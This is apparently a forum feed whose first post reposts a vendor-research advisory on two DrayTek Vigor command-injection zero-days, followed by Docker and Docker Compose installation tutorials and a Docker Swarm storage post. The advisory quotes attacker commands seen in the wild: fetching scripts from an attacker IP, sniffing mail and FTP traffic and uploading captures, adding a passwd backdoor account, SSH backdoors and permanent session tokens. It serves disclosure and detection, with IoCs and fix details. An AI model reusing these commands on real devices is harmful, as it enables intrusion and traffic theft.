Men in Black

Administrator

Last active 1 hour ago

  1. 2 days ago
    Sat Mar 28 12:56:27 2020
    Men in Black started the conversation Two zero days are Targeting DrayTek Broadband CPE Devices.

    [attachment:5e7ee474dde24]

    Background

    From December 4, 2019, 360Netlab Threat Detection System has observed two different attack groups using two 0-day vulnerabilities of DrayTek[1] Vigor enterprise routers and switch devices to conduct a series of attacks, including eavesdropping on device’s network traffic, running SSH services on high ports, creating system backdoor accounts, and even creating a specific Malicious Web Session backdoor.

    On December 25, 2019, due to the highly malicious nature of the attack, we disclosed on Twitter[2] [3] the ongoing 0-day attack IoC without mentioning the vendor name or product lines. We also provided more details to some national CERTs.

    On February 10, 2020, the manufacturer DrayTek issued a security bulletin[4], which fixed the vulnerability and released the latest firmware, version 1.5.1. (Here we actually have an easter egg we might talk about later.)

    Vulnerability analysis

    With the help of the 360 Firmware Total system[5], we were able to perform vulnerability research. The two 0-day command injection points are keyPath and rtick, both located in /www/cgi-bin/mainfunction.cgi; the corresponding web server program is /usr/sbin/lighttpd.

    keyPath command injection vulnerability analysis

    Vulnerability type: unauthorized remote command execution vulnerability
    Vulnerability details: The DrayTek devices support two account password transmission methods: plain text and RSA encrypted transmission.
    For RSA encrypted transmission, the interaction logic is:

    1. The web front end uses the RSA public key to encrypt the username and password, and uses a keyPath field to specify the file suffix of the RSA private key to initiate a login request;
    2. When the formLogin() function in the /www/cgi-bin/mainfunction.cgi detects that the keyPath field is not empty, the decryption starts;
    3. formLogin() uses the keyPath as input to craft the following path /tmp/rsa/private_key_<keyPath> as the RSA private key;
    4. formLogin() performs Base64 decoding on the username and password fields, writes them to the file /tmp/rsa/binary_login, and executes the following command to decrypt the username and password:
       openssl rsautl -inkey '/tmp/rsa/private_key_<keyPath>' -decrypt -in /tmp/rsa/binary_login

    5. Finally, the formLogin() function takes the decrypted user name and password to continue the verification.

    The issue here is that the keyPath value is not properly validated before it is used to build the command above, which makes unauthorized remote command execution possible.

    Bug fix: In version 1.5.1, the keyPath field is limited to a length of 30, and its content must consist of hexadecimal characters.
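
    As a hypothetical illustration of the kind of check the fix describes (this is not DrayTek's actual code, just a sketch of a length and character-set filter in shell):

    # Accept keyPath only if it is 1-30 hexadecimal characters; reject everything else.
    keyPath="$1"
    case "$keyPath" in
      ""|*[!0-9A-Fa-f]*) echo "invalid keyPath" >&2; exit 1 ;;
    esac
    if [ "${#keyPath}" -gt 30 ]; then
      echo "keyPath too long" >&2
      exit 1
    fi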

    [attachment:5e7ee59c05d34]

    rtick command injection vulnerability analysis

    Vulnerability Type: unauthorized remote command execution vulnerability
    Vulnerability details: When /www/cgi-bin/mainfunction.cgi needs to generate a verification code, it calls the function formCaptcha(). The function does not check the incoming timestamp from rtick and calls /usr/sbin/captcha directly to generate the CAPTCHA image <rtick>.gif, which makes command injection possible.

    Bug fix: In version 1.5.1, the vendor limits the rtick field to use only [0-9].

    [attachment:5e7ee5d601177]

    Analysis of wild 0-day attacks

    Attack Group A

    1. Attacker A uses the keyPath command injection vulnerability to download and execute the script http://103.82.143.51:58172/vig/tcpst1, and then further downloads and executes the following scripts.

    http://103.82.143.51:58172/vi1
    http://103.82.143.51:58172/vig/mailsend.sh1

    2. The script /etc/mailsend.sh eavesdrops on all network interfaces of the DrayTek Vigor device, capturing traffic to and from ports 21, 25, 143, and 110. The tcpdump command /usr/sbin/tcpdump -i any -n -nn port 21 or port 25 or port 143 or port 110 -s 65535 -w /data/firewall.pcap & runs in the background, and a crontab is in place to upload the captured packets to https://103.82.143.51:58443/uploLSkciajUS.php every Monday, Wednesday, and Friday at 0:00 (a reconstruction of such a cron entry is sketched below).
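
    In crontab terms, that schedule corresponds to an entry like the one below. This is a hypothetical reconstruction for illustration only; the attacker's actual upload command is not part of the published IoCs, so curl is just a stand-in:

    # min hour day-of-month month day-of-week  command
    0 0 * * 1,3,5 curl -k -F 'file=@/data/firewall.pcap' https://103.82.143.51:58443/uploLSkciajUS.php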

    Attack group B

    1. Attacker B uses the rtick command injection vulnerability to create 2 sets of Web Session backdoors that never expire in the file /var/session.json:

    json -f /var/session.json set 7:CBZD1SOMBUHVAF34TPDGURT9RTMLRUDK username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json
    json -f /var/session.json set 7:R8GFPS6E705MEXZWVQ0IB1SM7JTRVE57 username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json

    2. Attacker B further creates SSH backdoors on TCP/22335 and TCP/32459:

    /usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 22335 | iptables -I PPTP_CTRL 1 -p tcp --dport 22335 -j ACCEPT
    /usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 32459 | iptables -I PPTP_CTRL 1 -p tcp --dport 32459 -j ACCEPT

    3. A system backdoor account wuwuhanhan:caonimuqin is added as well.

    sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$3u34GCgO$9Pklx3.3OVwbIBja/CzZN/:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;
    sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$sbIljOP5$vacGOLqYAXcw3LWek9aJQ.:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;

    Web Session backdoor

    When we studied the 0-day PoC, we noticed that when the session parameter updatetime is set to 0, the DrayTek Vigor network device never logs the session out unless the device is rebooted.
    (aka Auto-Logout: Disable)

    [attachment:5e7ee69e17857]

    Timeline

    2019/12/04 We discovered ongoing attacks using the DrayTek Vigor 0-day keyPath vulnerability
    2019/12/08 We reached out to a channel to report the vulnerability (but only later found that it did not work out)
    2019/12/25 We disclosed the IoCs on Twitter and provided more details to some national CERTs
    2020/01/28 We discovered ongoing attacks using the DrayTek Vigor 0-day rtick vulnerability
    2020/02/01 MITRE published CVE-2020-8515
    2020/02/10 DrayTek released a security bulletin and the latest firmware fix

    Affected firmware list

    Vigor2960           <  v1.5.1
    Vigor300B           <  v1.5.1
    Vigor3900           <  v1.5.1
    VigorSwitch20P2121  <= v2.3.2
    VigorSwitch20G1280  <= v2.3.2
    VigorSwitch20P1280  <= v2.3.2
    VigorSwitch20G2280  <= v2.3.2
    VigorSwitch20P2280  <= v2.3.2

    Suggestions

    We recommend that DrayTek Vigor users check and update their firmware in a timely manner, and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc. on their systems.
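
    For a quick manual triage, the checks below sketch one way to look for the indicators described in this post (the account name, ports, and paths are taken from the analysis above; the exact tools available depend on the device's shell):

    # Packet-capture process started by attack group A
    ps | grep '[t]cpdump'

    # Backdoor system account added by attack group B
    grep 'wuwuhanhan' /etc/passwd

    # Dropbear SSH backdoors on the high ports used in the attacks
    netstat -lnt 2>/dev/null | grep -E ':22335|:32459'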

    We recommend monitoring and blocking the following IoCs on networks where applicable.

    MD5

    7c42b66ef314c466c1e3ff6b35f134a4
    01946d5587c2774418b5a6c181199099
    d556aa48fa77040a03ab120b4157c007

    URL

    http://103.82.143.51:58172/vig/tcpst1
    http://103.82.143.51:58172/vi1
    http://103.82.143.51:58172/vig/mailsend.sh1
    https://103.82.143.51:58443/LSOCAISJDANSB.php
    https://103.82.143.51:58443/uploLSkciajUS.php

    Scanner IP

    103.82.143.51       	Korea                   ASN136209           	Korea Fast Networks 
    178.151.198.73      	Ukraine             	ASN13188            	Content Deli

    https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/

  2. 2 weeks ago
    Fri Mar 13 07:58:01 2020
    Men in Black started the conversation How To Install and Use Docker Compose on CentOS 7.

    [attachment:5e6ad832a0a85]

    Introduction

    Docker is a great tool for automating the deployment of Linux applications inside software containers, but to really take full advantage of its potential it’s best if each component of your application runs in its own container. For complex applications with a lot of components, orchestrating all the containers to start up and shut down together (not to mention talk to each other) can quickly become unwieldy.

    The Docker community came up with a popular solution called Fig, which allowed you to use a single YAML file to orchestrate all your Docker containers and configurations. This became so popular that the Docker team decided to make Docker Compose based on the Fig source, which is now deprecated. Docker Compose makes it easier for users to orchestrate the processes of Docker containers, including starting up, shutting down, and setting up intra-container linking and volumes.

    In this tutorial, you will install the latest version of Docker Compose to help you manage multi-container applications, and will explore the basic commands of the software.

    Docker and Docker Compose Concepts

    Using Docker Compose requires combining a number of different Docker concepts, so before we get started let’s take a minute to review the various concepts involved. If you’re already familiar with Docker concepts like volumes, links, and port forwarding, you might want to go ahead and skip on to the next section.

    Docker Images

    Each Docker container is a local instance of a Docker image. You can think of a Docker image as a complete Linux installation. Usually a minimal installation contains only the bare minimum of packages needed to run the image. These images use the kernel of the host system, but since they are running inside a Docker container and only see their own file system, it’s perfectly possible to run a distribution like CentOS on an Ubuntu host (or vice-versa).

    Most Docker images are distributed via the Docker Hub, which is maintained by the Docker team. Most popular open source projects have a corresponding image uploaded to the Docker Registry, which you can use to deploy the software. When possible, it’s best to grab “official” images, since they are guaranteed by the Docker team to follow Docker best practices.

    Communication Between Docker Images

    Docker containers are isolated from the host machine, meaning that by default the host machine has no access to the file system inside the Docker container, nor any means of communicating with it via the network. This can make configuring and working with the image running inside a Docker container difficult.

    Docker has three primary ways to work around this. The first and most common is to have Docker specify environment variables that will be set inside the Docker container. The code running inside the Docker container will then check the values of these environment variables on startup and use them to configure itself properly.

    Another commonly used method is a Docker data volume. Docker volumes come in two flavors — internal and shared.

    Specifying an internal volume just means that for a folder you specify for a particular Docker container, the data will be persisted when the container is removed. For example, if you wanted to make sure your log files persisted you might specify an internal /var/log volume.

    A shared volume maps a folder inside a Docker container onto a folder on the host machine. This allows you to easily share files between the Docker container and the host machine.

    The third way to communicate with a Docker container is via the network. Docker allows communication between different Docker containers via links, as well as port forwarding, allowing you to forward ports from inside the Docker container to ports on the host server. For example, you can create a link to allow your WordPress and MariaDB Docker containers to talk to each other and use port-forwarding to expose WordPress to the outside world so that users can connect to it.
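
    As a rough sketch of these mechanisms using plain docker commands (the image, variable, and volume names below are placeholders chosen for illustration, not something this tutorial sets up):

       # Pass configuration via an environment variable, persist /var/log in a named
       # volume, share a host folder into the container, and forward container port 80
       # to host port 8080.
       docker run -d \
         -e APP_ENV=production \
         -v applogs:/var/log \
         -v "$PWD/html:/usr/share/nginx/html" \
         -p 8080:80 \
         nginx

    Docker Compose expresses the same ideas declaratively through the environment, volumes, ports, and links keys in docker-compose.yml, which is what the rest of this tutorial uses.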

    Prerequisites

    To follow this article, you will need the following:

    • CentOS 7 server, set up with a non-root user with sudo privileges

    Once these are in place, you will be ready to follow along.

    Step 1 — Installing Docker Compose

    In order to get the latest release, take the lead of the Docker docs and install Docker Compose from the binary in Docker’s GitHub repository.

    Check the current release and if necessary, update it in the command below:

        sudo curl -L "https://github.com/docker/compose/releases/download/1.23.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose

    Next, set the permissions to make the binary executable:

       sudo chmod +x /usr/local/bin/docker-compose

    Then, verify that the installation was successful by checking the version:

       docker-compose --version

    This will print out the version you installed:

    Output
    docker-compose version 1.23.2, build 1110ad01

    Now that you have Docker Compose installed, you’re ready to run a “Hello World” example.

    Step 2 — Running a Container with Docker Compose

    The public Docker registry, Docker Hub, includes a simple “Hello World” image for demonstration and testing. It illustrates the minimal configuration required to run a container using Docker Compose: a YAML file that calls a single image.

    First, create a directory for our YAML file:

       mkdir hello-world

    Then change into the directory:

       cd hello-world

    Now create the YAML file using your favorite text editor. This tutorial will use Vi:

       vi docker-compose.yml

    Enter insert mode by pressing i, then put the following contents into the file:

    docker-compose.yml
    
    my-test:
      image: hello-world

    The first line will be part of the container name. The second line specifies which image to use to create the container. When you run the command docker-compose up it will look for a local image by the name specified, hello-world.

    With this in place, hit ESC to leave insert mode. Enter :x then ENTER to save and exit the file.

    To look manually at images on your system, use the docker images command:

        docker images

    When there are no local images at all, only the column headings display:

    Output
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE

    Now, while still in the ~/hello-world directory, execute the following command to create the container:

       docker-compose up

    The first time we run the command, if there’s no local image named hello-world, Docker Compose will pull it from the Docker Hub public repository:

    Output
    Pulling my-test (hello-world:)...
    latest: Pulling from library/hello-world
    1b930d010525: Pull complete
    . . .

    After pulling the image, docker-compose creates a container, attaches, and runs the hello program, which in turn confirms that the installation appears to be working:

    Output
    . . .
    Creating helloworld_my-test_1...
    Attaching to helloworld_my-test_1
    my-test_1 | 
    my-test_1 | Hello from Docker.
    my-test_1 | This message shows that your installation appears to be working correctly.
    my-test_1 | 
    . . .

    It will then print an explanation of what it did:

    Output
    . . .
    my-test_1  | To generate this message, Docker took the following steps:
    my-test_1  |  1. The Docker client contacted the Docker daemon.
    my-test_1  |  2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
    my-test_1  |     (amd64)
    my-test_1  |  3. The Docker daemon created a new container from that image which runs the
    my-test_1  |     executable that produces the output you are currently reading.
    my-test_1  |  4. The Docker daemon streamed that output to the Docker client, which sent it
    my-test_1  |     to your terminal.
    . . .

    Docker containers only run as long as the command is active, so once hello finished running, the container stops. Consequently, when you look at active processes, the column headers will appear, but the hello-world container won’t be listed because it’s not running:

        docker ps
    
    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES

    Use the -a flag to show all containers, not just the active ones:

        docker ps -a
    
    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES
    50a99a0beebd        hello-world         "/hello"            3 minutes ago       Exited (0) 3 minutes ago                       hello-world_my-test_1

    Now that you have tested out running a container, you can move on to exploring some of the basic Docker Compose commands.

    Step 3 — Learning Docker Compose Commands

    To get you started with Docker Compose, this section will go over the general commands that the docker-compose tool supports.

    The docker-compose command works on a per-directory basis. You can have multiple groups of Docker containers running on one machine — just make one directory for each container and one docker-compose.yml file for each directory.

    So far you’ve been running docker-compose up on your own, from which you can use CTRL-C to shut the container down. This allows debug messages to be displayed in the terminal window. This isn’t ideal though; when running in production it is more robust to have docker-compose act more like a service. One simple way to do this is to add the -d option when you up your session:

       docker-compose up -d

    docker-compose will now fork to the background.
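
    If you still want to watch the container output after detaching, docker-compose can follow the logs for the current project (pressing CTRL-C here stops following the logs, not the containers):

       docker-compose logs -f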

    To show your group of Docker containers (both stopped and currently running), use the following command:

       docker-compose ps -a

    If a container is stopped, the State will be listed as Exited, as shown in the following example:

    Output
            Name            Command   State    Ports
    ------------------------------------------------
    hello-world_my-test_1   /hello    Exit 0        

    A running container will show Up:

    Output
         Name              Command          State        Ports      
    ---------------------------------------------------------------
    nginx_nginx_1   nginx -g daemon off;   Up      443/tcp, 80/tcp 

    To stop all running Docker containers for an application group, issue the following command in the same directory as the docker-compose.yml file that you used to start the Docker group:

       docker-compose stop

    Note: docker-compose kill is also available if you need to shut things down more forcefully.

    In some cases, Docker containers will store their old information in an internal volume. If you want to start from scratch you can use the rm command to fully delete all the containers that make up your container group:

    docker-compose rm

    If you try any of these commands from a directory other than the directory that contains a Docker container and .yml file, it will return an error:

    Output
    ERROR:
            Can't find a suitable configuration file in this directory or any
            parent. Are you in the right directory?
    
            Supported filenames: docker-compose.yml, docker-compose.yaml

    This section has covered the basics of how to manipulate containers with Docker Compose. If you needed to gain greater control over your containers, you could access the filesystem of the Docker container and work from a command prompt inside your container, a process that is described in the next section.

    Step 4 — Accessing the Docker Container Filesystem

    In order to work on the command prompt inside a container and access its filesystem, you can use the docker exec command.

    The “Hello World” example exits after it runs, so to test out docker exec, start a container that will keep running. For the purposes of this tutorial, use the Nginx image from Docker Hub.

    Create a new directory named nginx and move into it:

        mkdir ~/nginx
        cd ~/nginx

    Next, make a docker-compose.yml file in your new directory and open it in a text editor:

       vi docker-compose.yml

    Next, add the following lines to the file:

    ~/nginx/docker-compose.yml
    
    nginx:
      image: nginx

    Save the file and exit. Start the Nginx container as a background process with the following command:

       docker-compose up -d

    Docker Compose will download the Nginx image and the container will start in the background.

    Now you will need the CONTAINER ID for the container. List all of the containers that are running with the following command:

       docker ps

    You will see something similar to the following:

    Output of `docker ps`
    CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS               NAMES
    b86b6699714c        nginx               "nginx -g 'daemon of…"   20 seconds ago      Up 19 seconds       80/tcp              nginx_nginx_1

    If you wanted to make a change to the filesystem inside this container, you’d take its ID (in this example b86b6699714c) and use docker exec to start a shell inside the container:

       docker exec -it b86b6699714c /bin/bash

    The -t option opens up a terminal, and the -i option makes it interactive. /bin/bash opens a bash shell to the running container.

    You will then see a bash prompt for the container similar to:

    root@b86b6699714c:/#

    From here, you can work from the command prompt inside your container. Keep in mind, however, that unless you are in a directory that is saved as part of a data volume, your changes will disappear as soon as the container is restarted. Also, remember that most Docker images are created with very minimal Linux installs, so some of the command line utilities and tools you are used to may not be present.

  3. Fri Mar 13 07:43:52 2020
    Men in Black started the conversation How To Install and Use Docker on CentOS 7.

    Introduction

    Docker is an application that makes it simple and easy to run application processes in a container, which are like virtual machines, only more portable, more resource-friendly, and more dependent on the host operating system. For a detailed introduction to the different components of a Docker container, check out The Docker Ecosystem: An Introduction to Common Components.

    There are two methods for installing Docker on CentOS 7. One method involves installing it on an existing installation of the operating system. The other involves spinning up a server with a tool called Docker Machine that auto-installs Docker on it.

    In this tutorial, you’ll learn how to install and use it on an existing installation of CentOS 7.

    Prerequisites

    • 64-bit CentOS 7 Droplet
    • Non-root user with sudo privileges. A CentOS 7 server set up using Initial Setup Guide for CentOS 7 explains how to set this up.

    Note: Docker requires a 64-bit version of CentOS 7 as well as a kernel version equal to or greater than 3.10. The default 64-bit CentOS 7 Droplet meets these requirements.

    All the commands in this tutorial should be run as a non-root user. If root access is required for the command, it will be preceded by sudo. Initial Setup Guide for CentOS 7 explains how to add users and give them sudo access.

    Step 1 — Installing Docker

    The Docker installation package available in the official CentOS 7 repository may not be the latest version. To get the latest and greatest version, install Docker from the official Docker repository. This section shows you how to do just that.

    But first, let’s update the package database:

       sudo yum check-update

    Now run this command. It will add the official Docker repository, download the latest version of Docker, and install it:

       curl -fsSL https://get.docker.com/ | sh

    After installation has completed, start the Docker daemon:

       sudo systemctl start docker

    Verify that it’s running:

       sudo systemctl status docker

    The output should be similar to the following, showing that the service is active and running:

    Output
    ● docker.service - Docker Application Container Engine
       Loaded: loaded (/lib/systemd/system/docker.service; enabled; vendor preset: enabled)
       Active: active (running) since Sun 2016-05-01 06:53:52 CDT; 1 weeks 3 days ago
         Docs: https://docs.docker.com
     Main PID: 749 (docker)

    Lastly, make sure it starts at every server reboot:

       sudo systemctl enable docker

    Installing Docker now gives you not just the Docker service (daemon) but also the docker command line utility, or the Docker client. We’ll explore how to use the docker command later in this tutorial.

    Step 2 — Executing Docker Command Without Sudo (Optional)

    By default, running the docker command requires root privileges — that is, you have to prefix the command with sudo. It can also be run by a user in the docker group, which is automatically created during the installation of Docker. If you attempt to run the docker command without prefixing it with sudo or without being in the docker group, you’ll get an output like this:

    Output
    docker: Cannot connect to the Docker daemon. Is the docker daemon running on this host?.
    See 'docker run --help'.

    If you want to avoid typing sudo whenever you run the docker command, add your username to the docker group:

       sudo usermod -aG docker $(whoami)

    You will need to log out of the Droplet and back in as the same user to enable this change.

    If you need to add a user to the docker group that you’re not logged in as, declare that username explicitly using:

       sudo usermod -aG docker username

    The rest of this article assumes you are running the docker command as a user in the docker user group. If you choose not to, please prepend the commands with sudo.
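
    After logging back in, a quick way to confirm the group change took effect is to check your groups and run a docker command without sudo:

       groups
       docker ps

    The docker group should appear in the output of groups, and docker ps should run without a permissions error.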

    Step 3 — Using the Docker Command

    With Docker installed and working, now’s the time to become familiar with the command line utility. Using docker consists of passing it a chain of options and subcommands followed by arguments. The syntax takes this form:

       docker [option] [command] [arguments]

    To view all available subcommands, type:

       docker

    As of Docker 1.11.1, the complete list of available subcommands includes:

    Output
        attach    Attach to a running container
        build     Build an image from a Dockerfile
        commit    Create a new image from a container's changes
        cp        Copy files/folders between a container and the local filesystem
        create    Create a new container
        diff      Inspect changes on a container's filesystem
        events    Get real time events from the server
        exec      Run a command in a running container
        export    Export a container's filesystem as a tar archive
        history   Show the history of an image
        images    List images
        import    Import the contents from a tarball to create a filesystem image
        info      Display system-wide information
        inspect   Return low-level information on a container or image
        kill      Kill a running container
        load      Load an image from a tar archive or STDIN
        login     Log in to a Docker registry
        logout    Log out from a Docker registry
        logs      Fetch the logs of a container
        network   Manage Docker networks
        pause     Pause all processes within a container
        port      List port mappings or a specific mapping for the CONTAINER
        ps        List containers
        pull      Pull an image or a repository from a registry
        push      Push an image or a repository to a registry
        rename    Rename a container
        restart   Restart a container
        rm        Remove one or more containers
        rmi       Remove one or more images
        run       Run a command in a new container
        save      Save one or more images to a tar archive
        search    Search the Docker Hub for images
        start     Start one or more stopped containers
        stats     Display a live stream of container(s) resource usage statistics
        stop      Stop a running container
        tag       Tag an image into a repository
        top       Display the running processes of a container
        unpause   Unpause all processes within a container
        update    Update configuration of one or more containers
        version   Show the Docker version information
        volume    Manage Docker volumes
        wait      Block until a container stops, then print its exit code

    To view the switches available to a specific command, type:

       docker docker-subcommand --help

    To view system-wide information, use:

       docker info

    Step 4 — Working with Docker Images

    Docker containers are run from Docker images. By default, it pulls these images from Docker Hub, a Docker registry managed by Docker, the company behind the Docker project. Anybody can build and host their Docker images on Docker Hub, so most applications and Linux distributions you’ll need to run Docker containers have images that are hosted on Docker Hub.

    To check whether you can access and download images from Docker Hub, type:

       docker run hello-world

    The output, which should include the following, should indicate that Docker is working correctly:

    Output
    Hello from Docker.
    This message shows that your installation appears to be working correctly.
    ...

    You can search for images available on Docker Hub by using the docker command with the search subcommand. For example, to search for the CentOS image, type:

       docker search centos

    The script will crawl Docker Hub and return a listing of all images whose names match the search string. In this case, the output will be similar to this:

    Output
    NAME                            DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
    centos                          The official build of CentOS.                   2224      [OK]       
    jdeathe/centos-ssh              CentOS-6 6.7 x86_64 / CentOS-7 7.2.1511 x8...   22                   [OK]
    jdeathe/centos-ssh-apache-php   CentOS-6 6.7 x86_64 / Apache / PHP / PHP M...   17                   [OK]
    million12/centos-supervisor     Base CentOS-7 with supervisord launcher, h...   11                   [OK]
    nimmis/java-centos              This is docker images of CentOS 7 with dif...   10                   [OK]
    torusware/speedus-centos        Always updated official CentOS docker imag...   8                    [OK]
    nickistre/centos-lamp           LAMP on centos setup                            3                    [OK]
    
    ...

    In the OFFICIAL column, OK indicates an image built and supported by the company behind the project. Once you’ve identified the image that you would like to use, you can download it to your computer using the pull subcommand, like so:

       docker pull centos

    After an image has been downloaded, you may then run a container using the downloaded image with the run subcommand. If an image has not been downloaded when docker is executed with the run subcommand, the Docker client will first download the image, then run a container using it:

       docker run centos

    To see the images that have been downloaded to your computer, type:

       docker images

    The output should look similar to the following:

    Output
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
    centos              latest              778a53015523        5 weeks ago         196.7 MB
    hello-world         latest              94df4f0ce8a4        2 weeks ago         967 B

    As you’ll see later in this tutorial, images that you use to run containers can be modified and used to generate new images, which may then be uploaded (pushed is the technical term) to Docker Hub or other Docker registries.

    Step 5 — Running a Docker Container

    The hello-world container you ran in the previous step is an example of a container that runs and exits, after emitting a test message. Containers, however, can be much more useful than that, and they can be interactive. After all, they are similar to virtual machines, only more resource-friendly.

    As an example, let’s run a container using the latest image of CentOS. The combination of the -i and -t switches gives you interactive shell access into the container:

       docker run -it centos

    Your command prompt should change to reflect the fact that you’re now working inside the container and should take this form:

    Output
    [root@59839a1b7de2 /]#

    Important: Note the container id in the command prompt. In the above example, it is 59839a1b7de2.

    Now you may run any command inside the container. For example, let’s install MariaDB server in the running container. No need to prefix any command with sudo, because you’re operating inside the container with root privileges:

       yum install mariadb-server

    Step 6 — Committing Changes in a Container to a Docker Image

    When you start up a Docker image, you can create, modify, and delete files just like you can with a virtual machine. The changes that you make will only apply to that container. You can start and stop it, but once you destroy it with the docker rm command, the changes will be lost for good.

    This section shows you how to save the state of a container as a new Docker image.

    After installing MariaDB server inside the CentOS container, you now have a container running off an image, but the container is different from the image you used to create it.

    To save the state of the container as a new image, first exit from it:

       exit

    Then commit the changes to a new Docker image instance using the following command. The -m switch is for the commit message that helps you and others know what changes you made, while -a is used to specify the author. The container ID is the one you noted earlier in the tutorial when you started the interactive docker session. Unless you created additional repositories on Docker Hub, the repository is usually your Docker Hub username:

       docker commit -m "What did you do to the image" -a "Author Name" container-id repository/new_image_name

    For example:

       docker commit -m "added mariadb-server" -a "Sunday Ogwu-Chinuwa" 59839a1b7de2 finid/centos-mariadb

    Note: When you commit an image, the new image is saved locally, that is, on your computer. Later in this tutorial, you’ll learn how to push an image to a Docker registry like Docker Hub so that it may be accessed and used by you and others.

    After that operation has completed, listing the Docker images now on your computer should show the new image, as well as the old one that it was derived from:

       docker images

    The output should be of this sort:

    Output
    REPOSITORY             TAG                 IMAGE ID            CREATED             SIZE
    finid/centos-mariadb   latest              23390430ec73        6 seconds ago       424.6 MB
    centos                 latest              778a53015523        5 weeks ago         196.7 MB
    hello-world            latest              94df4f0ce8a4        2 weeks ago         967 B

    In the above example, centos-mariadb is the new image, which was derived from the existing CentOS image from Docker Hub. The size difference reflects the changes that were made. And in this example, the change was that MariaDB server was installed. So next time you need to run a container using CentOS with MariaDB server pre-installed, you can just use the new image. Images may also be built from what’s called a Dockerfile. But that’s a very involved process that’s well outside the scope of this article. We’ll explore that in a future article.

    Step 7 — Listing Docker Containers

    After using Docker for a while, you’ll have many active (running) and inactive containers on your computer. To view the active ones, use:

       docker ps

    You will see output similar to the following:

    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
    f7c79cc556dd        centos              "/bin/bash"         3 hours ago         Up 3 hours                              silly_spence

    To view all containers — active and inactive, pass it the -a switch:

       docker ps -a

    To view the latest container you created, pass it the -l switch:

    docker ps -l

    Stopping a running or active container is as simple as typing:

       docker stop container-id

    The container-id can be found in the output from the docker ps command.

    Step 8 — Pushing Docker Images to a Docker Repository

    The next logical step after creating a new image from an existing image is to share it with a select few of your friends, the whole world on Docker Hub, or another Docker registry that you have access to. To push an image to Docker Hub or any other Docker registry, you must have an account there.

    This section shows you how to push a Docker image to Docker Hub.

    To create an account on Docker Hub, register at Docker Hub. Afterwards, to push your image, first log into Docker Hub. You’ll be prompted to authenticate:

       docker login -u docker-registry-username

    If you specified the correct password, authentication should succeed. Then you may push your own image using:

       docker push docker-registry-username/docker-image-name

    It will take some time to complete, and when completed, the output will be of this sort:

    Output
    The push refers to a repository [docker.io/finid/centos-mariadb]
    670194edfaf5: Pushed 
    5f70bf18a086: Mounted from library/centos 
    6a6c96337be1: Mounted from library/centos
    
    ...

    After pushing an image to a registry, it should be listed on your account’s dashboard, like the one shown in the image below.

    [attachment:5e6ad7111abcb]

    If a push attempt results in an error of this sort, then you likely did not log in:

    Output
    The push refers to a repository [docker.io/finid/centos-mariadb]
    e3fbbfb44187: Preparing
    5f70bf18a086: Preparing
    a3b5c80a4eba: Preparing
    7f18b442972b: Preparing
    3ce512daaf78: Preparing
    7aae4540b42d: Waiting
    unauthorized: authentication required

    Log in, then repeat the push attempt.

  4. 3 weeks ago
    Fri Mar 6 22:00:16 2020
    Men in Black started the conversation Docker Swarm Persistent Storage.

    Unless you’ve been living under a rock, you should need no explanation of what Docker is. Using Docker over the last year has drastically improved my deployment ease, and coupled with GitLab’s CI/CD it has made deployment extremely easy. Mind you, not all our applications being deployed have the same requirements; some are extremely simple and others are extraordinarily complex. So when we start a new project we have a base docker build to begin from, and based on the application’s requirements we add/remove as needed.

    A little about Docker Swarm

    For the large majority of our applications, having a volume associated with the deployed containers and storing information in the database fits the application’s needs.

    In front of all our applications we used to use Docker Flow Proxy to quickly integrate our application into our deployed environment and assign it a subdomain based on its service. For a few months we experienced issues with the proxy hanging up, resources not being cleared, and lots of dropped connections. Since then I have rebuilt our docker infrastructure and now we use Traefik for our proxy routing, and it has been absolutely amazing! It’s extremely fast, very robust and extensible, and easy to manipulate to fit your needs. Heck, before even deploying it I was using docker-compose to build a local network proxy to ensure it was what we needed. While Traefik was running in compose I was hitting domains such as http://whoami.localhost/ and this was a great way to learn the basic configuration before pushing it into a staging/production swarm environment. (Explaining how we got started with Traefik is a whole other post of its own.)

    Now back to our docker swarm. I know the big thing right now is Kubernetes. But every organization has its own specific needs for its different environments, application types, and deployment mechanisms. In my opinion the current docker environment we’ve got running right now is pretty robust. We’ve got dozens of nodes, a number of deployment environments (cybersec, staging, and production), dozens of applications running at once, and some of them requiring a number of services in order to function properly.

    A few of the things that won me over on the docker swarm in the first place are its load balancing capabilities, its fault tolerance, and the self-healing mechanism that it uses in case a container crashes, a node locks up or drops, or a number of other issues occur. (We’ve had a number of servers go down due to networking issues or a rack server crapping out, and with the docker swarm running you could never even tell we were having issues as an end user of our applications.)

    (Below is an image showing traffic hitting the swarm. If you have an application replicated upon deployment, traffic will be distributed amongst the nodes to prevent bottlenecks.)

    -image-

    Why would you need persistent storage?

    Since the majority of our applications are data oriented (with most of them hitting several databases in a single request), we hadn’t really had to worry about persistent storage. This is because once we deployed the applications, their volumes held all of their required assets and any data they needed was fetched from the database.

    The easiest way to explain volumes is that when a container is deployed to a node, it will (if specified) put aside a section of storage specifically for that container. For example, say we have an application called DogTracker that was deployed on nodes A and B. This application can create and store files in its volumes on those nodes. But what happens when there’s an issue with the container on node A and the container cycles to node C? The data created by the container is left in the volume on node A and is no longer available until that application’s container cycles back to node A.

